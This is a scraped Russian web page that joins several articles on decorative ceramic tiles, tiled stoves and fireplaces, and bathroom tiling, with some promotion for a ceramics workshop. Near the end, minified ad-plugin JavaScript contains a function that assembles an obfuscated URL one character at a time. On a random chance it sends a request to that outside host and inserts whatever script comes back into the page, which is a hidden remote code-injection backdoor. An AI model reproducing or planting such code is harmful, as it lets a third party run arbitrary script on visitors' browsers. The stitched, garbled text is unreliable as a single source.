5 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Изразцы в интерьере

Что такое изразцы и каких видов они бывают?

Изразцы являются популярным традиционным украшением, их часто используют в современных типах интерьера. Яркие керамические элементы особенно уместно смотрятся при декорировании каминов, кухни или ванной комнаты, однако можно встретить и другие варианты применения изразцов.

Зачастую расписные плитки достаточно броские – они будут заметно выделяться в обстановке интерьера, поэтому дизайн комнаты с подобным декором следует тщательно продумать.

Что это такое?

Изразцы – это старинные расписные плитки из глины с традиционными узорами, простыми изображениями пейзажей, людей или животных. В разных странах для таких украшений были характерны разные орнаменты.

Русские изразцы обычно украшали цветами и растительными элементами, восточные – мелким узором и изображениями животных, а на голландских плитках изображали бытовые сцены из жизни крестьян.

В старину для изготовления декоративных плиток делались формы из отдельного материала, в которые затем выкладывали глину, после чего обжигали плитку. Современные мастера, которые создают изразцы ручной работы, изготавливают такие формы из гипса. Также в современных магазинах сейчас можно найти и множество типовых изразцов, изготовленных на фабриках – они ничем не уступают по качеству традиционным вариантам, однако обойдутся вам значительно дешевле.

Если же вы любите работать руками, вы можете попробовать изготовить изразцы самостоятельно. Сначала вылепляется одна плитка, потом она помещается в жидкий гипс, а когда гипс застынет, с помощью получившейся формы вы сможете сделать столько плиток, сколько вам нужно. При этом помните, что обычная современная духовка имеет недостаточную температуру нагрева для обжига глины.

Роспись изразцов в старину производилась вручную. Уникальные плитки с неповторимыми узорами ручной работы вы и сейчас можете заказать у частных мастеров или же попробовать выполнить роспись самостоятельно. Обычно плитки покрывают глазурью для керамики, или же используют акриловые краски в сочетании с акриловым лаком. При этом ручная работа обойдется дорого или же потребует от вас собственного времени и усилий. В гипермаркетах товаров для дома или в интернет-магазинах можно приобрести доступные изразцы фабричного производства – они не будут уникальными, однако обойдутся значительно дешевле.

Если вы собираетесь приобрести изразцы в магазине товаров для ремонта, отдайте предпочтение европейским, белорусским производителям, а также фабрикам из России. Модели из Индии и Китая могут иметь более привлекательную цену, однако не всегда подобные товары будут качественными – особенно часто можно столкнуться с некачественной росписью, которая неровно нанесена или быстро стирается. Часто изразцы продаются целыми комплектами по несколько штук.

При покупке таких комплектов убедитесь, что все изделия качественные – без трещин, сколов и дефектов рисунка.

Печь в интерьере: изразцовая, старинная, надежная

Интерьер – многогранное слово, которое у каждого человека вызывает собственные ассоциации – кто – то видит себя в комнате с классическим дизайном, для кого – то исторические мотивы являются главными в стиле, а некоторые представляют, как разместят в гостиной печь, которая будет украшена старинными изразцами.

Красота изразцов удачно дополняет и современный интерьер. Современный камин, который имеется в большинстве загородных домов, по желанию хозяина можно без труда превратить в роскошный источник тепла, для этого достаточно произвести кладку изразцами.

Изразцы: что это?

Изразцы – изделия из керамики, которые отличаются от привычной плитки тем, что являются произведением искусства, так как в процессе производства используется техника ручной росписи, что делает их товаром уникальным и вызывающим неподдельный интерес у ценителей старины.

Рисунки на изразцах не повторяются, яркость красок позволяет сохранить глазурь. Эти элементы изготовляются из глины определенного сорта, проходят традиционный для керамики обжиг в печи, но от прочих их отличает необычная форма – короб. Она позволяет отделочному материалу эффективнее сберегать тепло. Изразец плотно прилегает в кладке, не оставляет зазоров, что делает ее прочной, долговечной и уникальной. Благодаря этому материалу можно вернуть к жизни старые печи, которые имеют непрезентабельный облик.

Разнообразие старинного отделочного материала

Изразцовые печи насчитывают многовековую историю, потому не удивительно, что стилей и направлений в оформлении имеется достаточно много. Самым необычным и самобытным является русский – в его основе лежат яркие цветовые сочетания и необычные, замысловатые орнаменты.

Голландский стиль основан на монохромной росписи, подчеркнуто строгой, но предающей помещению уют. Использовался в домах зажиточных граждан. Фламандский стиль схож с голландским, но основные цвета росписи – синий и коричневый.

На старинных изразцах часто изображались стилизованные растения и цветы, сказочные персонажи или животные, мифические сюжеты, поэтому подобрать для себя вариант сможет каждый человек.

Процесс обжига сложен и его нельзя провести своими руками, не имея специальных устройств. Заготовки заполняются шамотной глиной, затем в течении двух недель просушиваются и только потому отправляются в электрическую печь, где проходит обжиг при очень высоких температурах. Первая партия называется титульная, по ней определяется качество всех остальных элементов. Затем наступает очередь нанесения глазури и повторного обжига, после которого наносится соответствующий рисунок и проводится еще один обжиг.

Облицовка печи: особенности

Современная или старинная печь имеется в доме – все они являются частью искусства, которое передается из поколения в поколение. Для того чтобы сохранить ее в хорошем состоянии, необходимо произвести облицовку, которая должна быть выполнена по определенным правилам, дающим гарантию долговечности.

Облицовка уже сложенных и функционирующих печей, а также современных каминов изразцами является делом, требующим особого мастерства и знаний. Специалистов, которые могут произвести все работы с учетом норм и требований, уважают и ценят, поскольку они не только украшают печь, но и улучшают ее функционал. Облицованная изразцами, она повышает свою теплоотдачу в несколько раз.

Главная и самая важная особенность процесса кладки, которая существует, состоит в том, что вначале устанавливают непосредственно керамические изделия — изразцы и только потом к ним монтируется кирпичный корпус самой печи. Керамика для облицовки может быть плоской, карнизной и даже угловой.

Печь декорирована изразцовой плиткой

Общим для всех керамических элементов, использующихся в облицовки печей и каминов, является то, что все они имеют форму короба, покрытие глазурью (однотонной или цветной) и специальную систему крепления, называемую румпой. Если печь или камин в интерьере только планируется, то отказываться от облицовки не следует, так как она позволит максимально гармонично встроить их в обстановку помещения, а также сохранит прочность конструкции. Важно помнить, что отличительной чертой этих элементов отделки является экономия времени – их можно красть сразу же, то есть отделка печи изразцами выполняется одновременно с ее кладкой. Однако работа очень трудоемка, поэтому производя ее своими руками, следует максимально подготовиться или доверять ее профессионалам, которые знают все нюансы и тонкости этого строительного искусства.

Подготовка материалов к работе

Особенность подготовки материалов напрямую связана с тем, что изразцы являются по своей сути товаром штучным, эксклюзивным. Именно поэтому первым этапом подготовительных работ является сортировка, которая включает в себя тип и размер, а также цвет и рисунок, если планируется орнаментная кладка. Особого внимания заслуживает сортировка бракованных изделий – все изразцы, которые будут использованы в процессе облицовки должны быть качественными, брак глазури или наличие трещин недопустимы, так как эффект от их применения будет утрачен. Произвести все эти действия своими руками не сложно.

Вариант отделки поверхности изразцами

Выполняя кладку своими руками, следует помнить правило – темные цвета укладываются вниз, светлые ряды вверх, поэтому можно разложить имеющиеся керамические изделия по оттенкам заранее, чтобы сэкономить время. Малозаметный «брак» допускается к укладке в боковых зонах.

Следующий этап подготовки – «подгонка» по размеру и шлифование бортиков. Для удобства рекомендуется сделать эталон, согласно которому обрабатывать и все остальные элементы.

Непосредственно перед укладкой материал замачивают в воде – это позволит улучшить сцепление керамики с глиняным раствором.

Процесс облицовки

Непосредственно процесс облицовки своими руками начинается с аккуратного выкладывания первого ряда керамических элементов. Этот этап одинаков как для печей, так и для каминов. После того как печь украшена первым рядом, к нему крепится печной корпус из кирпичей. Рекомендации по укладке: в начале производится укладка без использования глиняного раствора, фиксируется положение элементов, затем нужно разобрать ряд и, начиная с углов, произвести работу с использованием раствора. Далее следует действовать по следующей не сложной схеме, воспроизвести которую не сложно и своими руками:

  • 1 ряд – кладка из кирпичей
  • 2 ряд – изразцы
  • 3 ряд – румпа
  • 4 ряд – штырь
  • 5 ряд – скоба
  • 6 ряд – проволока
  • 7 ряд – петли для крепежа.

Сочетание изразцов и штукатурки

Румпу необходимо заполнить глиняным раствором на ½ объема и, как можно плотнее вдавить в него мелкие камушки – лучше использовать речную гальку. Сверху наносят слой кладочного раствора, который должен доходить до бортов. Далее необходимо прижать к изделию кирпич. В тот момент, когда кирпичной кладки становится по высоте равна уровню изразцового ряда, отделочный материал требуется стянуть проволокой.

Совет: лучше всего пропускать проволоку сквозь загибы крепежных элементов, которые затем следует осадить, а концы проволоки аккуратно вывести в кирпичную кладку.

Вертикальные ряды румп рекомендуется скрепить для лучшей крепости печи стальными скобами, важно проследить за тем, чтобы они защелкнулись. Толщина шва между двумя горизонтальными рядами, которая допускается при осуществлении кладки, должна составлять не менее 3 мм, так как декоративная часть будет оседать вместе с кирпичной основой. Для того чтобы печь или камин смотрелись привлекательно, необходимо строго соблюдать эти рекомендации.

Изразцы для каминов и печей

Завершив отделку и создание кирпичной кладки, требуется все образовавшиеся в процессе швы тщательно зачистить, используя шило, а потом промыть от остатков раствора поверхность и хорошо просушивают ее.

Следующий этап совершенствования печей или каминов – нанесение на швы гипсового теста. Оно должно подсохнуть несколько минут, а лишнее количество просто убирается сухой тряпкой. Окончательный этап отделки печей и каминов своими руками – высыхание, которое продолжается 14-21 день в зависимости от микроклимата в помещении. Внимание – все это время растапливать печь или камин запрещено.

Заключение

Сегодня можно сохранить древнее искусство украшения печей, обратившись к мастеру или выполнив все необходимые действия своими руками. Среди основных декоративных стилей можно выбрать наиболее подходящий к имеющемуся интерьеру. Если хочется чего – то необычного, то роспись может иметь восточные мотивы или иметь в своей основе мифологический сюжет.

Лицевая сторона объемного керамического украшения для печи имеет рисунок, который дополнительно покрыт глазурью, выполняющей не только декоративную, но и защитную функции. Необычная форма открытого короба позволяет увеличить крепость изделия, а вместе с ним и надежность всей кладки. Долговечность конструкции обеспечивает, имеющаяся между слоями воздушная подушка, которая препятствует образованию грибка или плесени. Делать подобную кладку своими руками не сложно, но если опыта не достаточно, тогда лучше всего обратиться к профессионалу.

В том случае если для камина хочется создать эксклюзивный вариант украшения, тогда требуется обращение к мастеру, который по предоставленным эскизам сможет провести работу по созданию изразцов.

Художественные изразцы для ванной: магия авторской керамики в вашем интерьере

Правильно уложенная плитка для ванной высшего сорта смотрится очень аккуратно

Авторские расписные изразцы от мастеров Веста-Керамика – настоящее произведение искусства с исключительными эксплуатационными характеристиками

Былинное солнышко – сплошной позитив в интерьере ванной

Изразец для ванной из серии «Инфант»

Эффектное сочетание рельефной и гладкой плитки способно превратить обыкновенную ванную комнату в роскошную уборную викторианского периода

При отделке стен и полов ванной комнаты необходимо ориентироваться на практичность, экологичность и эстетичность. Только в этом случае окружающее пространство будет радовать вас комфортом и дарить позитивное настроение.

Современный высокосортный кафель для ванной имеет ряд преимуществ по сравнению с дешевой плиткой, включая:

  • Стопроцентную однородность по габаритам. Благодаря использованию инновационного оборудования, все плитки получаются строго одинакового размера. Это гарантирует идеальную геометрию рисунка при правильной укладке.
  • Низкую гигроскопичность. Низкая способность впитывать влагу – одна из неотъемлемых характеристик высококачественной плитки для ванной.
  • Высокую прочность и износостойкость. Плитку премиум-класса трудно поцарапать, а отколоть от нее кусочек практически невозможно. Эти качества кафель получает за счет ультрасовременных технологий изготовления глиняных смесей и тщательно выверенных температур обжига.

Однако даже самая высокосортная плитка и самые интересные оформительские решения не в состоянии превратить ванную комнату в уникальное пространство с эксклюзивным интерьером. Такую возможность дизайнерам предоставляют только изразцы из глины – особый вид отделочного материала, изготовление и укладка которого происходит по специальным технологиям.

Отличия глиняных изразцов от обычного кафеля

В отличие от обычного кафеля изразцы для ванной с обратной стороны имеют специальные отверстия для максимально прочного крепления на облицовываемую поверхность. Кроме того, декорированные авторской живописью или рельефным рисунком, изразцы становятся основой для создания уникальных художественных композиций.

Глазурованными глиняными изразцами можно отделывать все помещение ванной комнаты, при этом используются:

  • прямые (плоские) изразцы – для укладки основного полотна.
  • угловые или фасонные изделия – для облицовки технологических выступов. Такие изразцы обеспечивают надежную герметизацию и могут иметь различную форму.

Художественные изразцы для ванной от мастеров Веста-Керамика: особенности и достоинства

Наибольшую ценность в качестве материала для создания эксклюзивных дизайнерских композиций представляют изразцы для ванной с авторской живописью и рельефными рисунками. Каждый такой изразец, оформленный художником-керамистом мастерской Веста Керамика, становится настоящим произведением искусства.

Само собой разумеется, что стоимость изделий с авторским художественным оформлением существенно выше стоимости штампованной плитки заводского производства. Однако в данном случае денежные вложения себя оправдывают на все сто процентов: вы получаете не только роскошный дорогой интерьер, но и исключительно практичное отделочное покрытие.

Благодаря специальным технологиям изготовления, соединившим вековые традиции и современные возможности, наши изразцы для ванной отличаются уникальными эксплуатационными характеристиками – они не поглощают и, соответственно, не накапливают влагу, обладают исключительной прочностью и десятилетиями не меняют свой внешний вид.

Экономичные решения для эксклюзивных интерьеров

При ограниченном бюджете или стремлении к разумной экономии можно получить не менее эффектное решение, соединив в интерьере ванной качественный кафель и панно из расписных глиняных изразцов.

Так, например, в ванной комнате с ретро интерьером будет очень эффектно смотреться панно в стиле азулежу или былинной живописи, а теплые тона и живописные пейзажи наполнят помещение неповторимым обаянием средиземноморских побережий.

Живописные мини-картины передают настроение автора и создают особенную обстановку, превращая окружающее пространство в идеальное место для релаксации.

Для создания неординарных дизайнерских решений в пределах среднего бюджета можно использовать не только панно, но и сочетание однотонной плитки с художественными изразцами.

Так, например, очаровательные миниатюрные ангелы из серии «Инфант» наполнят детскую ванную комнату теплой и радостной атмосферой чуда, а вашей романтичной жене будет особенно комфортно в ванной, украшенной изразцами из «Весенней» серии.

Рельефные изразцы из глины

В оформление санузла способны внести дополнительные нюансы не только цветовая гамма, орнамент и элементы живописи, но и фактура изразцов. Посмотрите, как великолепно сочетаются рельефные изразцы серии «Радуга» с гладкой плиткой:

А такие рельефные изразцы из глины способны стать ключевой нотой дизайна ванной в стиле «модерн».

Композиции для ванной из художественных изразцов и расписного фаянса

Комбинация санфаянса с художественной росписью с выполненными в едином стиле элементами отделки из изразцов позволяет дизайнерам создавать полностью эксклюзивные интерьеры.

Художники-керамисты нашей мастерской расписывают унитазы JIKA (Чехия) и LAUFEN (Швейцария) авторской живописью в различных стилях, и могут оформить под заказ изразцовую плитку для ванной с аналогичным рисунком.

Санфаянс с художественной росписью

© 2005-2017, Веста-керамика
Изразцы ручной работы

Изразцовые печи и камины: особенности, достоинства и критерии выбора

Фото: Gutbrod Keramik

Изразцами облицовывают не только печь, но и дымовую трубу, причём нередко в пределах всех жилых этажей дома. Фото: «Керамика Декор»

Классические изразцы — это толстостенные керамические плитки особой формы: их тыльная сторона снабжена контурным бортиком — румпой. Коробчатая форма позволяет надёжно прикрепить изразец к кирпичной кладке отрезками проволоки, пропущенными через отверстия в бортике.

Изразцы окрашивают глазурованием. Современные глазури очень разнообразны и позволяют создавать широкую палитру ярких цветов и пастельных тонов. Фото: Gutbrod Keramik

Фото: «Керамика Декор»

Изразцовые печи: историческая справка

Изразцовые печи были широко распространены на Руси уже в XVII в. Увы, до наших дней большинство из них дошло в разрушенном или многократно перестроенном виде, так что восстановить первоначальный облик крайне сложно; можно лишь предположить, что все такие печи топились по-белому.

Немногочисленные сохранившиеся экземпляры (в доме купчихи Шумиловой в Гороховце, в доме купца Шарапова в Торопце, в Новодевичьем монастыре, Троице-Сергиевой Лавре и др.) представляют собой прямоугольные в плане сооружения с дымо­оборотом, но без лежанок, духовок и конфорок. То есть служили они исключительно для отопления. Такие печи устанавливали в углу помещения или специально обустроенном проёме (чтобы обогревать две смежные комнаты). Порой конструкцию оборудовали топ­ливным каналом, что позволяло топить из сеней.

Зато сами изразцы сохранились во множестве. В XVI в. они украшались рельефным узором без росписи и глазуревого покрытия и имели цвет обожжённой глины. В следующем столетии господствовали рельефные расписные и зелёные глазурованные («ценинные» и «муравлёные») изразцы, а при Петре I распространение получили гладкие белые плитки с синим узором («дельфтские кафли»).

Изразцовые печи сегодня

Сегодня изразцовые печи строят по индивидуальным проектам несколько российских компаний — «Гильдия Мастеров», «Веста-Керамика», «Керамика Декор», «Русская Майолика» и др. Кроме того, можно заказать облицовочные комплекты для стальных и чугунных топок, а также сборных (модульных) печей из шамота. Ну и наконец, изразцовая облицовка присутствует на некоторых моделях готовых металлических печей-каминов.

Современные художники и мастера с успехом воссоздают старинные изразцы и реконструируют печи, стоявшие в царских палатах и монастырях.

Фото: «Гильдия Мастеров»

Фото: «Керамика Декор»

Преимущества израцовых печей и каминов

Для начала поговорим о практических преимуществах «кожуха» из глазурованной керамики.

Гладкие изразцы с рисунком, нанесённым эмалью, — визитная карточка старонемецкой школы. Фото: Gutbrod Keramik

Фото: «Керамика Декор»

Основная функция изразцов декоративная, однако всегда ценились и другие качества керамической облицовки, в частности — долговечность и простота в уходе. С гладкой глазурованной поверхности очень легко удалять пыль и другие загрязнения, благодаря чему печь всегда аккуратно выглядит и от неё никогда не пахнет гарью.

Облицовку из складских утильных плиток изготовят за 2–3 недели. Индивидуальный проект реализуют до 3 месяцев.

Фото: «Керамика Декор»

Кроме того, в силу своей микропористой структуры толстостенная керамика имеет свойство одновременно изолировать и накапливать тепло, то есть стенки прибора не раскаляются до опасной температуры, а после окончания топки медленно остывают в течение ночи, что намного повышает комфортабельность печного отопления. При этом инерционность печи зависит от ширины (высоты) румпы и технологии облицовки.

Детали сборного камина с керамической облицовкой

Визуализация: Игорь Смирягин/Burda Media

Фото: «Керамика Декор»

Как создают изразцы

Художественные изразцы для реализации индивидуальных проектов сегодня, как и в старину, производят вручную. Облицовочный комплект, помимо рядовых (стенных) плиток, обычно включает цокольные, поясные, карнизные, угловые и полочные элементы, а иногда ещё и розетки, балясины, полуколонны с капителями и арки.

Размерного стандарта в изразцовом деле не существует — всё зависит от габаритов и формы печи, а также художественного замысла облицовки; толщина стенок изразцов обычно составляет 7–10 мм.

Фото: «Керамика Декор»

Процесс работы над комплектом изразцов (печным набором) начинается с создания эскизов и моделей, обычно пластилиновых. С моделей делают слепки и получают набор гипсовых форм. Их сушат, затем заполняют глиной, часто с добавлением керамической крошки, мелкого гравия или песка. В таком виде заготовки выдерживают в сушильном шкафу не менее недели, чтобы глина не растрескалась при обжиге. Далее изразцы подвергают первому («утильному») обжигу в специальной печи при точно заданной температуре, затем расписывают, покрывают защитной глазурью и обжигают вторично; может потребоваться до пяти обжигов — в зависимости от числа слоёв эмали и глазури.

У каждой компании есть каталог работ и типовых орнаментов, однако ничто не мешает заказчику предложить собственные эскизы или просто высказать идеи, касающиеся стиля или сюжета будущих рисунков. Здесь можно дать полную свободу фантазии — например, попробовать сочетать классическую «дельфтскую» технику с современной тематикой, скопировать манеру импрессионистов или по-новому осмыслить сюжеты русских сказок.

Повышенная безопасность: керамическая облицовка никогда не нагревается до температуры выше 60 °С, обжечься о стенку печи невозможно.

Высокая стоимость (по сравнению с простыми кирпичными, а тем более бюджетными стальными печами).

Теплоаккумулирующие свойства. При использовании металлической топки облицовка служит барьером на пути «жёсткого» инфракрасного излучения, накапливает тепло и медленно отдаёт его.

Значительная масса, зачастую мешающая установить печь без фундамента или усиления перекрытия.

Простота в уходе. С поверхности керамических изделий легко удаляются любые загрязнения. Они стойки к воздействию кислот и растворителей.

Сравнительно невысокая стойкость к механическим повреждениям и сложность ремонта облицовки.

Необычные возможности оформления интерьера в самых разных стилях.

Технология строительства

Особенность строительства классической изразцовой печи в том, что кирпичную кладку и облицовку ведут одновременно. При этом ряды изразцов связывают друг с другом штырями (костылями) и скобами и фиксируют на стенках печи витыми отрезками стальной проволоки, которые замуровывают в швы кирпичной кладки. Плитку кладут впустошовку, однако полость румпы и пространство между румпами соседних изразцов заполняют глиняным раствором с добавлением кирпичной крошки или дресвы (особого мелкого гравия).

Существуют технологии, позволяющие отделать изразцами и уже построенную печь. Можно, например, использовать для этой цели кладочную или дорожную сетку, которую крепят к печи стальными анкерами, а уже к ней вяжут изразцы. Или, срезав румпу, просто приклеить элементы облицовки жаростойким клеем, например Universal HKM (Wolfshöher Tonwerke) или Scanmix Fire (Scanmix). Клеевой способ дешевле классического и позволяет уменьшить число фасонных элементов, но при нём не добиться хорошего теплоаккумулирующего эффекта.

Заводские печи комплектуют в основном монохромной облицовкой, однако плитка может быть рельефной. Фото: Hein

Если в основе печи или камина — чугунная или стальная топка, то возможны несколько способов её облицовки. Чаще всего топку обкладывают кирпичом или блоками из лёгкого бетона, а затем приклеивают изразцы.

Другой вариант предполагает изготовление контурного металлокаркаса (например, из уголка) — независимого или приваренного к стенкам топки. Для крепления изразцов к каркасу используют проволочную вязку, пластины и скобы.

Наконец, облицовка может быть самонесущей: изразцы с высокой румпой кладут, как кирпичи, на расстоянии от стенок топки, никак не связывая с ней, но армируя кладку проволокой, прутками, а кое-где и стальными профилями.

Изразцы без румпы можно приклеивать к кладке жаростойким клеем. Фото: «Веста-Керамика»

Критерии выбора каминной (печной) топки

  • Тепловая мощность. Если прибор планируется использовать как основной источник тепла во время весенних, осенних и зимних визитов на дачу, то следует руководствоваться формулой: 1 кВт номинальной теп­ловой мощности на 10 м2 площади помещения.
  • Материал. Чугунные изделия считаются более долговечными. Если топка стальная, то желательно, чтобы её колосник был выполнен из чугуна, а стенки защищены футеровкой из шамотных блоков.
  • Тип дверцы. Для изразцового камина лучше выбирать топку с традиционной распашной, а не подъёмной дверцей. Стилизовать конструкцию под старину помогут арочные створки.
  • Наличие функций дожига дымовых газов и чистого стекла. Эти опции увеличат эффективность прибора и упростят его обслуживание.
  • Наличие функции длительного горения. Как правило, такие топки оснащены точными регуляторами воздушных заслонок и шибером на выходном патрубке. Они довольно экономичны и способны работать на одной закладке дров до 4 ч.

Пояс. Фото: «Керамика Декор»

Изразцовые печи-камины

В наши дни едва ли не самый популярный дровяной отопительный прибор — это печь-камин. Компактные заводские изделия из котловой стали или чугуна просты в транспортировке и монтаже и достаточно долговечны: реальный срок их службы составляет 20–40 лет.

Облицевать изразцами можно топку любого типа — пристенную, угловую и даже тоннельную. Важно правильно выбрать способ крепления плитки.

Зарубежные компании ABX, La Nordica, Enbra и другие производят печи-камины с керамической облицовкой. Разумеется, это не совсем изразцы, а скорее имитация, однако внешне они точно воспроизводят традиционные изделия, да и по свойствам мало от них отличаются. При этом большинство керамических печей-каминов не только изящно выглядят, но и обладают впечатляющим набором функций, в том числе дожигом дымовых газов, самоочисткой стекла дверцы и даже встроенным теплообменником для подключения водяного контура.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};

Рельефный угловой изразец из глины

Панно «Португальский букет» в силе азулежу

Средиземноморские мотивы удачно впишутся в интерьер ванной комнаты

«Весенняя» серия создана для романтичных натур с тонким вкусом

Фактурный изразец с характерным для стиля модерн орнаментом

Преимущества Недостатки
Яндекс.Метрика